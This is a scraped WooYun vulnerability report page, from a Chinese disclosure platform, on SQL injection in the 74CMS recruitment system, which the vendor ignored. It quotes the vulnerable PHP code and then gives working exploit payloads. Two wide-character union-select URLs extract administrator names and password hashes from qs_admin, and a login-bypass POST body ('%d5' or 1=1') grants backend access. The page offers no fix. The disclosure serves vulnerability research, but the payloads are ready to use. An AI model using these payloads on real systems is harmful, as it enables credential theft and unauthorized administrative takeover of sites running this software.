				$("#attend_action").html('<a class="btn" href="javascript:void(0)" onclick="AttendBug('+id+')">'+_LANGJS.ATTENTION_BUG+'</a></span>');
			}else{
				alert(_LANGJS.FAIL_MANAGE);
			}
		});
	}
}

function CollectBug(id,token){
	$.get('/ajaxdo.php',{'module':'collect','id':id,'token':token,'rid':Math.random()},function(re){
		if(re==1){
			$("#collection_num").html(parseInt($("#collection_num").html())+1);
			$(".btn-fav").removeClass("fav-add");
			$(".btn-fav").addClass("fav-cancel");
			$(".btn-fav").unbind();
			$(".btn-fav").click(function(){
					CollectCancel(id,token);
				});
		}else if(re==2){
			alert(_LANGJS.LOGIN_FIRST);
		}else if(re==3){
			alert(_LANGJS.COLLECTION_BUG_DONE);
		}else{
			alert(_LANGJS.FAIL_MANAGE);
		}
	});
}
function CollectCancel(id,token){
	if(confirm(_LANGJS.COLLECTION_BUG_CONFIRM+"?")){
		$.get('/ajaxdo.php',{'module':'collectcancel','id':id,'token':token,'rid':Math.random()},function(re){
			if(re==1){
				$("#collection_num").html(parseInt($("#collection_num").html())-1);
				$(".btn-fav").removeClass("fav-cancel");
				$(".btn-fav").addClass("fav-add");
				$(".btn-fav").unbind();
				$(".btn-fav").click(function(){
					CollectBug(id,token);
				});
			}else{
				alert(_LANGJS.FAIL_MANAGE);
			}
		});
	}
}
</script>

	<div class="content">
<input type="hidden" id="token" style="display:none" value="" />
		<h2>漏洞概要
						<span style="margin:0 0 0 580px; float:right; position:absolute; font-size:14px; font-weight:normal">关注数(<span id="attention_num">6</span>)
		 <span id="attend_action">
		 		 <a class="btn" href="javascript:void(0)" onclick="AttendBug(10319)">关注此漏洞</a></span>
		 		 </span></h2>

		<h3>缺陷编号：		<a href="wooyun-2012-010319">WooYun-2012-10319</a>
			<input id="fbid" type="hidden" value="10319">
					</h3>

		<h3 class='wybug_title'>漏洞标题：		74CMS 人才系统注入全版本通杀进后台  					</h3>

		<h3 class='wybug_corp'>相关厂商：		<a href="http://www.wooyun.org/corps/骑士人才系统">
														74cms.com														</a>
		</h3>

		<h3 class='wybug_author'>漏洞作者：		<a href="http://www.wooyun.org/whitehats/小屁孩">小屁孩</a></h3>
		<h3 class='wybug_date'>提交时间：		2012-07-30 14:27</h3>
				<h3 class='wybug_open_date'>公开时间：		2012-08-04 14:28</h3>
		<h3 class='wybug_type'>漏洞类型：		SQL注射漏洞</h3>

		<h3 class='wybug_level'>危害等级：		高</h3>
				<h3>自评Rank：		10</h3>
				<h3 class='wybug_status'>漏洞状态：
															漏洞已经通知厂商但是厂商忽略漏洞
																</h3>

		<h3>漏洞来源：		<a href="http://www.wooyun.org">http://www.wooyun.org</a>，如有疑问或需要帮助请联系 help@wooyun.org</h3>
		<h3>Tags标签：
								无
					
</h3>
		<h3>
		<!-- Baidu Button BEGIN -->
        <div id="share">
        	<div style="float:right; margin-right:100px;font-size:12px">
            <span class="fav-num"><a id="collection_num">2</a>人收藏</span>
			<a style="text-decoration:none; font-size:12px" href="javascript:void(0)" class="fav-add btn-fav">收藏</a>
<script type="text/javascript">
var token="";
var id="10319";

$(".btn-fav").click(function(){ CollectBug(id,token); });

</script>
			</div>
            <span style="float:left;">分享漏洞：</span>
            <div id="bdshare" class="bdshare_b" style="line-height: 12px;"><img src="http://bdimg.share.baidu.com/static/images/type-button-5.jpg" />
                <a class="shareCount"></a>
            </div>
        </div>
        <!-- Baidu Button END -->
    	</h3>
		<hr align="center"/>

		<h2>漏洞详情</h2>
		<h3 class="detailTitle">披露状态：</h3>
		<p class="detail" style="padding-bottom:0">
					</p>
		<p class="detail wybug_open_status">
									2012-07-30：	细节已通知厂商并且等待厂商处理中<br/>
									2012-08-04：	厂商已经主动忽略漏洞，细节向公众公开<br/>
								</p>
		<h3 class="detailTitle">简要描述：</h3>

		<p class="detail wybug_description">整套程序过滤的还是比较全面的  不过所有版本都是GBK编码是他的硬伤  但是基本上字符串入库的时候作者都使用了iconv来把提交过来的数据编码转换成utf8<br />
<br />
所以利用宽字符注入就没办法了  但是过滤完善仅限3.2版本之前  最新的3.2版本plus目录多了几个文件  不知道是不是换了程序员了... 先上两个白痴注入吧~<br />
<br />
</p>

		
						<h3 class="detailTitle">详细说明：</h3>
    <div class='wybug_detail'>
			<p class="detail">注射1: <br />
<br />
</p><fieldset class='fieldset fieldset-code'><legend>code 区域</legend><pre><code>\plus\ajax_officebuilding.php (16行)<br />
<br />
if($act == &#039;alphabet&#039;)<br />
{<br />
        $alphabet=trim($_GET[&#039;x&#039;]); //笑嘻嘻  肯定是换程序员了 不解释<br />
        if (!empty($alphabet))<br />
        {<br />
$result = $db-&gt;query(&quot;select * from &quot;.table(&#039;category&#039;).&quot; where c_alias=&#039;QS_officebuilding&#039; AND c_index=&#039;{$alphabet}&#039; &quot;); //笑嘻嘻<br />
        while($row = $db-&gt;fetch_array($result))<br />
        {<br />
                if ($listtype==&quot;li&quot;)<br />
                {<br />
                $htm.=&quot;&lt;li  title=\&quot;{$row[&#039;c_name&#039;]}\&quot; id=\&quot;{$row[&#039;c_id&#039;]}\&quot;&gt;{$row[&#039;c_name&#039;]}&lt;/li&gt;&quot;;<br />
                }<br />
                else<br />
                {<br />
                $htm.=&quot;&lt;li&gt;&lt;a href=\&quot;?officebuildingid={$row[&#039;c_id&#039;]}\&quot; title=\&quot;{$row[&#039;c_note&#039;]}\&quot; class=\&quot;vtip\&quot;&gt;{$row[&#039;c_name&#039;]}&lt;/a&gt;&lt;span&gt;{$row[&#039;stat_jobs&#039;]}&lt;/span&gt;&lt;/li&gt;&quot;;<br />
                }<br />
        }<br />
        if (empty($htm))<br />
        {<br />
        $htm=&quot;&lt;span class=\&quot;noinfo\&quot;&gt;没有找到首字母为：&lt;span&gt;{$alphabet}&lt;/span&gt;  的写字楼！&lt;/span&gt;&quot;;<br />
        }<br />
        $htm.=&quot;&lt;script type=\&quot;text/javascript\&quot;&gt; vtip();&lt;/script&gt;&quot;;<br />
        exit($htm);<br />
        }<br />
}</code></pre></fieldset><p class='detail'><br />
<br />
<br />
<br />
注射2: \plus\ajax_street.php (16行)<br />
<br />
</p><fieldset class='fieldset fieldset-code'><legend>code 区域</legend><pre><code>if($act == &#039;alphabet&#039;)<br />
{<br />
        $alphabet=trim($_GET[&#039;x&#039;]);  //几乎和上面一个注入一模一样的  不多说了<br />
        if (!empty($alphabet))<br />
        {<br />
$result = $db-&gt;query(&quot;select * from &quot;.table(&#039;category&#039;).&quot; where c_alias=&#039;QS_street&#039; AND c_index=&#039;{$alphabet}&#039; &quot;);//笑嘻嘻<br />
        while($row = $db-&gt;fetch_array($result))<br />
        {<br />
                if ($listtype==&quot;li&quot;)<br />
                {<br />
                $htm.=&quot;&lt;li  title=\&quot;{$row[&#039;c_name&#039;]}\&quot; id=\&quot;{$row[&#039;c_id&#039;]}\&quot;&gt;{$row[&#039;c_name&#039;]}&lt;/li&gt;&quot;;<br />
                }<br />
                else<br />
                {<br />
                $htm.=&quot;&lt;li&gt;&lt;a href=\&quot;?streetid={$row[&#039;c_id&#039;]}\&quot; title=\&quot;{$row[&#039;c_note&#039;]}\&quot; class=\&quot;vtip\&quot;&gt;{$row[&#039;c_name&#039;]}&lt;/a&gt;&lt;span&gt;{$row[&#039;stat_jobs&#039;]}&lt;/span&gt;&lt;/li&gt;&quot;;<br />
                }<br />
        }<br />
        if (empty($htm))<br />
        {<br />
        $htm=&quot;&lt;span class=\&quot;noinfo\&quot;&gt;没有找到首字母为：&lt;span&gt;{$alphabet}&lt;/span&gt;  的道路！&lt;/span&gt;&quot;;<br />
        }<br />
        exit($htm);<br />
        }<br />
}<br />
Exp:<br />
<br />
1. plus/ajax_officebuilding.php?act=alphabet&amp;x=11%d5&#039;%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,concat(0x3C623E5E5F5E203C2F623E,admin_name,0x3A,pwd,0x3C623E205E5F5E3C2F623E),9%20from%20qs_admin%23<br />
<br />
2. plus/ajax_street.php?act=alphabet&amp;x=11%d5&#039;%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,concat(0x3C623E5E5F5E203C2F623E,admin_name,0x3A,pwd,0x3C623E205E5F5E3C2F623E),9%20from%20qs_admin%23</code></pre></fieldset><p class='detail'><br />
<br />
<br />
<br />
</p><p class="detail usemasaic"><a href="../upload/201207/29214446173afe3d41f3aafa9dd7aadbafa4b14e.png" target="_blank"><img src="../upload/201207/29214446173afe3d41f3aafa9dd7aadbafa4b14e.png" alt="" width="600" onerror="javascript:errimg(this);"/></a></p><p class="detail"><br />
<br />
读过这程序的应该都知道有注入也是白搭 因为hash解不出来 我没仔细看他的密码加密方式 反正是多次加密的 试了十几个一个都没解出来....<br />
<br />
<br />
<br />
所以得来点杀伤力大的  不然不是白搞了吗  随后批量搜索了一些危险函数 执行 变量覆盖 写文件神马的 都没什么好的发现  继续把目标转向后台  立马就笑嘻嘻了~~<br />
<br />
</p><fieldset class='fieldset fieldset-code'><legend>code 区域</legend><pre><code>\admin\admin_login.php (42行)<br />
<br />
elseif($act == &#039;do_login&#039;)<br />
{<br />
        header(&quot;Expires: Mon, 26 Jul 1997 05:00:00 GMT&quot;);<br />
        header(&quot;Cache-Control: no-cache, must-revalidate&quot;);<br />
        header(&quot;Pragma: no-cache&quot;);<br />
         $admin_name = isset($_POST[&#039;admin_name&#039;]) ? trim($_POST[&#039;admin_name&#039;]) : &#039;&#039;; //没过滤~~~<br />
         $admin_pwd = isset($_POST[&#039;admin_pwd&#039;]) ? trim($_POST[&#039;admin_pwd&#039;]) : &#039;&#039;;<br />
        $postcaptcha = isset($_POST[&#039;postcaptcha&#039;]) ? $_POST[&#039;postcaptcha&#039;] : &#039;&#039;;<br />
         $remember = isset($_POST[&#039;rememberme&#039;]) ? intval($_POST[&#039;rememberme&#039;]) : 0;<br />
<br />
         if($admin_name == &#039;&#039;)<br />
        {<br />
        header(&quot;Location:?act=login&amp;err=&quot;.urlencode(&#039;用户名不能为空&#039;));<br />
        exit();<br />
         }<br />
         elseif($admin_pwd == &#039;&#039;)<br />
        {<br />
        header(&quot;Location:?act=login&amp;err=&quot;.urlencode(&#039;密码不能为空&#039;));<br />
        exit();<br />
         }<br />
        $captcha=get_cache(&#039;captcha&#039;);<br />
        if(empty($postcaptcha) &amp;&amp; $captcha[&#039;verify_adminlogin&#039;]==&#039;1&#039;)<br />
        {<br />
                header(&quot;Location:?act=login&amp;err=&quot;.urlencode(&#039;验证码不能为空&#039;));<br />
                exit();<br />
         }<br />
        if ($captcha[&#039;verify_adminlogin&#039;]==&#039;1&#039; &amp;&amp; strcasecmp($_SESSION[&#039;imageCaptcha_content&#039;],$postcaptcha)!=0)<br />
        {<br />
                write_log(&quot;&lt;span style=\&quot;color:#FF0000\&quot;&gt;验证码填写错误&lt;/span&gt;&quot;,$admin_name,2);<br />
                header(&quot;Location:?act=login&amp;err=&quot;.urlencode(&#039;验证码填写错误&#039;));<br />
                exit();<br />
        }<br />
         elseif(check_admin($admin_name,$admin_pwd)) //关键函数  直接带入进去了<br />
        {<br />
                 update_admin_info($admin_name);<br />
                write_log(&quot;成功登录&quot;,$admin_name);<br />
                 if($remember == 1)<br />
                {<br />
                        $admininfo=get_admin_one($admin_name);<br />
                         setcookie(&#039;Qishi[admin_id]&#039;, $_SESSION[&#039;admin_id&#039;], time()+86400, $QS_cookiepath, $QS_cookiedomain);<br />
                         setcookie(&#039;Qishi[admin_name]&#039;, $admin_name, time()+86400, $QS_cookiepath, $QS_cookiedomain);<br />
                        setcookie(&#039;Qishi[admin_pwd]&#039;, md5($admin_name.$admininfo[&#039;pwd&#039;].$admininfo[&#039;pwd_hash&#039;].$QS_pwdhash), time()+86400, $QS_cookiepath, $QS_cookiedomain);<br />
                 }<br />
         }<br />
        else<br />
        {<br />
                write_log(&quot;&lt;span style=\&quot;color:#FF0000\&quot;&gt;用户名或密码错误&lt;/span&gt;&quot;,$admin_name,2);<br />
                header(&quot;Location:?act=login&amp;err=&quot;.urlencode(&#039;用户名或密码错误&#039;));<br />
                exit();<br />
         }<br />
header(&quot;Location: admin_index.php&quot;); <br />
}</code></pre></fieldset><p class='detail'><br />
<br />
继续追下check_admin函数: \admin\include\admin_common.fun.php (197行)<br />
<br />
</p><fieldset class='fieldset fieldset-code'><legend>code 区域</legend><pre><code>function check_admin($name,$pwd)<br />
{<br />
      global $db,$QS_pwdhash;<br />
<br />
      $admin=get_admin_one($name); //先把程序name带入了这个函数进行了一次查询<br />
      $md5_pwd=md5($pwd.$admin[&#039;pwd_hash&#039;].$QS_pwdhash);<br />
      $row = $db-&gt;getone(&quot;SELECT COUNT(*) AS num FROM &quot;.table(&#039;admin&#039;).&quot; WHERE admin_name=&#039;$name&#039; and pwd =&#039;&quot;.$md5_pwd.&quot;&#039; &quot;); //继续查询<br />
      if($row[&#039;num&#039;] &gt; 0){<br />
             return true;<br />
      }else{<br />
             return false;<br />
      }<br />
}</code></pre></fieldset><p class='detail'><br />
<br />
再看看get_admin_one函数: \admin\include\admin_common.fun.php (237行)<br />
<br />
</p><fieldset class='fieldset fieldset-code'><legend>code 区域</legend><pre><code>function get_admin_one($username){<br />
        global $db;<br />
        $sql = &quot;select * from &quot;.table(&#039;admin&#039;).&quot; where admin_name = &#039;&quot;.$username.&quot;&#039; LIMIT 1&quot;; //同样直接查询了<br />
        return $db-&gt;getone($sql);<br />
}</code></pre></fieldset><p class='detail'><br />
<br />
get_admin_one函数和check_admin函数都是直接就带入查询了  除了POST开头被addslashes函数过滤过一次  但是在宽字符面前这些都是浮云~~<br />
<br />
<br />
<br />
so... 直接向 admin_login.php?act=do_login 构造以下POST语句就能直接进后台了~~  当然前提你得有后台路径:<br />
<br />
<br />
<br />
admin_name=fuckyou%d5&#039; or 1=1%23&amp;admin_pwd=1 </p>
    </div>
						
			<h3 class="detailTitle">漏洞证明：</h3>
      <div class='wybug_poc'>
			<p class="detail"></p><p class="detail usemasaic"><a href="../upload/201207/2921461361b6b23e0378c2d536c1321f9d1fdb35.gif" target="_blank"><img src="../upload/201207/2921461361b6b23e0378c2d536c1321f9d1fdb35.gif" alt="" width="600" onerror="javascript:errimg(this);"/></a></p><p class="detail"> </p>
    </div>
									<h3 class="detailTitle">修复方案：</h3>
      <div class='wybug_patch'>
			<p class="detail">高人来吧 </p>
    </div>
													<h3 class="detailTitle">版权声明：转载请注明来源 <a style="font-weight:normal" href="http://www.wooyun.org/whitehats/小屁孩" title="小屁孩">小屁孩</a>@<a style="font-weight:normal" href="http://www.wooyun.org/bugs/wooyun-2010-010319" title="74CMS 人才系统注入全版本通杀进后台">乌云</a></h3>
		<hr align="center"/>

		
			<h2 id="bugreply">漏洞回应</h2>
      <div class='bug_result'>
			
				
				
															<h3 class="detailTitle">厂商回应：</h3>
						<p class="detail">危害等级：无影响厂商忽略</p>
													<p class="detail">忽略时间：2012-08-04 14:28</p>
												<h3 class="detailTitle">厂商回复：</h3>
						<p class="detail"></p>
											
					<h3 class="detailTitle">最新状态：</h3>

											<p class="detail">暂无</p>
					
				      </div>
					
		
<hr align="center" />
<script type="text/javascript">
var bugid="10319";
var bugRating="-3";
var myRating="";
var ratingCount="0";



function ShowBugRating(k){
	var ratingItems=$(".myrating span");
	$.each(ratingItems,function(i,n){
		var nk=parseInt($(n).attr("rel"));
		if(nk<=k){
			$(n).addClass("on");
		}else{
			$(n).removeClass("on");
		}
	});
	$(".myrating span").hover(
		function(){
			$("#ratingShow").html($(this).attr("data-title"));
		},
		function(){
			$("#ratingShow").html("");
		}
	);
}
$(document).ready(function(){
	if(myRating==""){
		var ratingItems=$(".myrating span");
		$(".myrating span").hover(
			function(){
				$(this).addClass("hover");
				var k=parseInt($(this).attr("rel"));
				$.each(ratingItems,function(i,n){
					var nk=parseInt($(n).attr("rel"));
					if(nk<k) $(n).addClass("on");
					if(nk>k) $(n).removeClass("on");
				});
				$("#ratingShow").html($(this).attr("data-title"));
			},
			function(){
				$(this).removeClass("hover");
				if($("#myRating").val()==""){
					$.each(ratingItems,function(i,n){
						$(n).removeClass("on");
					});
				}
				$("#ratingShow").html("");
			}
		);

		$(".myrating span").click(function(){
			var rating=$(this).attr("rel");
			var k=parseInt($(this).attr("rel"));
			$.post("/ajaxdo.php?module=bugrating",{"id":bugid,"rating":rating,"token":$("#token").val()},function(re){
				//消除操作绑定
				$(".myrating span").unbind();
				re=parseInt(re);
				switch(re){
					case 1:
						$("#ratingShow").html(_LANGJS.RATING_SUCCESS);
						$("#ratingSpan").html(parseInt($("#ratingSpan").html())+1);
						$.each(ratingItems,function(i,n){
							var nk=parseInt($(n).attr("rel"));
							if(nk<=k){
								$(n).addClass("on");
							}else{
								$(n).removeClass("on");
							}
						});
						ShowBugRating(rating);
						break;
					case 2:
						$("#ratingShow").html(_LANGJS.LOGIN_FIRST);
						break;
					case 4:
						$("#ratingShow").html(_LANGJS.RATING_BUGS_DONE);
						break;
					case 6:
						$("#ratingShow").html(_LANGJS.RATING_BUGS_SELF);
						break;
					default:break;
				}
			});
		});
	}else{
		if(ratingCount>2){
			ShowBugRating(bugRating);
		}else{
			ShowBugRating(-3);
		}
	}
});

</script>
<h3 class="detailTitle">漏洞评价：</h3>
<p class="detail">对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值</p>
		<h5 class="rating">
		<div class="ratingText">漏洞评价<span>(共<span id="ratingSpan">0</span>人评价)</span>:</div>
		<div class="myrating">
			<span rel="-2" data-title="信息虚假或者没有任何自己的思考"></span>
			<span rel="-1" data-title="内容不详并且漏洞信息评级及类型明显错误"></span>
			<span rel="0" data-title="还可以，洞主继续努力"></span>
			<span rel="1" data-title="信息完整，过程清晰，有截图有代码有视频有真相"></span>
			<span rel="2" data-title="角度独特思路新颖值得学习"></span>
			<div id="ratingShow">
			登陆后才能进行评分			</div>
		</div>
		</h5>
		<input type="hidden" id="myRating" value="" />

<hr align="center" />
<h2>评价</h2>

<div id="replys" class="replys">
	    <ol class="replylist">
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-04 15:05</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/koohik">koohik</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:542 漏洞数:63        | 没什么介绍的http://www.koohik.com/)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="18999"></span>
        <span class="liketext liketext_min"><span id="likenum_18999">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>后台路径不好猜啊！ </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">1#</span>
                        <a title="回复 koohik" href="javascript:void(0)" class="replyBtn" onclick="Reply('koohik')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-04 15:46</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/momo">momo</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 实习白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:91 漏洞数:24        | ★精华漏洞数:88888 | WooYun认证√)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19006"></span>
        <span class="liketext liketext_min"><span id="likenum_19006">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>这个不能说是通杀的。3.2以前的版本没有第一个说的那2个文件的！ </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">2#</span>
                        <a title="回复 momo" href="javascript:void(0)" class="replyBtn" onclick="Reply('momo')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
            </ol><!-- replylist End -->
</div><!-- replys End -->

<div id="reply" class="reply">
<a name="comment"></a>
<p class="detail">
登录后才能发表评论，请先 <a href="http://wooyun.org/user.php?action=login"><u>登录</u></a> 。
</p>
<script type="text/javascript">
var masaic = '0';

function CommentLike(id){
	$.post("/ajaxdo.php?module=commentrating",{"id":id,"token":$("#token").val()},function(re){
		re=parseInt(re);
		switch(re){
			case 1:
				$("#likenum_"+id).html(parseInt($("#likenum_"+id).html())+1);
				break;
			case 4:
				alert(_LANGJS.COMMENT_GOOD_DONE);
				break;
			case 6:
				alert(_LANGJS.COMMENT_SELF);
				break;
			default:break;
		}
	});
}
$(document).ready(function(){
	$(".likebox .likepre").click(function(){
            CommentLike($(this).attr("rel"));
        });
});


</script>
<div>
	</div>
	<div id="footer">
        <span class="copyright fleft">
    		Copyright &copy; 2010 - 2016 <a href="wooyun-2012-010319#">wooyun.org</a>, All Rights Reserved
    		<a href="http://www.miibeian.gov.cn/">京ICP备15041338号-1</a>
    		<!--a href="http://sae.sina.com.cn" target="_blank"><img src="/images/sae_bottom_logo.png" title="Powered by Sina App Engine"></a-->
    	</span>
        <span class="other fright">
                        <a href="http://wooyun.org/impression">行业观点</a>
            · <a href="http://wooyun.org/lawer">法律顾问</a>
            · <a href="http://wooyun.org/contactus">联系我们</a>
            · <a href="http://wooyun.org/help">帮助</a>
            · <a href="http://wooyun.org/about">关于</a>
        </span>
    </div>
	<script type="text/javascript">
	var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
	document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fc12f88b5c1cd041a732dea597a5ec94c' type='text/javascript'%3E%3C/script%3E"));
	</script>
    <script type="text/javascript" id="bdshare_js" data="type=button" ></script>
    <script type="text/javascript" id="bdshell_js"></script>
    <script type="text/javascript">
        document.getElementById("bdshell_js").src = "http://bdimg.share.baidu.com/static/js/shell_v2.js?cdnversion=" + new Date().getHours();
        
        if (top.location !== self.location) top.location=self.location;
    </script>
</body>
</html>